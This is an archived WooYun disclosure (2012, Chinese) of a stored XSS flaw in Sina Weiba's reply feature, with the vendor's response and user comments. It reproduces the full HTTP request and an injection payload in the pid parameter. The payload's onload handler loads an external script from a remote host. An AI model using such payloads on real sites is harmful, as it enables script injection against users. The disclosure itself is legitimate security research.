当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-015671

漏洞标题:新浪微吧存储型跨站脚本漏洞

相关厂商:新浪

漏洞作者: 核心绿帽子

提交时间:2012-12-06 11:06

修复时间:2012-12-07 15:15

公开时间:2012-12-07 15:15

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:12

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-12-06: 细节已通知厂商并且等待厂商处理中
2012-12-07: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

新浪微薄某处存在跨站脚本漏洞。

详细说明:

新浪微吧回复处对图片参数pid过滤不严格,导致跨站脚本漏洞,可引入外部文件。

POST /aj_re/add?__rnd=1354716441725 HTTP/1.1
Host: weiba.weibo.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://weiba.weibo.com/10039/t/z8h1WseDA
Content-Length: 104
Pragma: no-cache
Cache-Control: no-cache
pid=7f29bc91gw1dzj7bm2ddsg&text=%E5%88%86%E4%BA%AB%E5%9B%BE%E7%89%87&tid=3519720926729477&forward=0&_t=0


pid=7f29bc91gw1dzj7bm2ddsg
修改为:
pid=7f29bc91gw1dzj7bm2ddsg" onload="var wooyun=document.createElement('script');wooyun.src='http://www.wooyun.com/js.js';document.body.appendChild(wooyun)"

漏洞证明:

xssing.png

修复方案:

净化输入输出!

版权声明:转载请注明来源 核心绿帽子@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2012-12-07 15:15

厂商回复:

此问题之前已经内部发现,已经修复。

最新状态:

暂无


漏洞评价:

评论

  1. 2012-12-07 02:54 | 水滴 ( 普通白帽子 | Rank:146 漏洞数:24 )

    那到底是微博还是微吧呢

  2. 2013-01-15 23:49 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    。。。这、、、、内部发现。。。乌云审核的时候,有时候漏洞就被厂商给修复了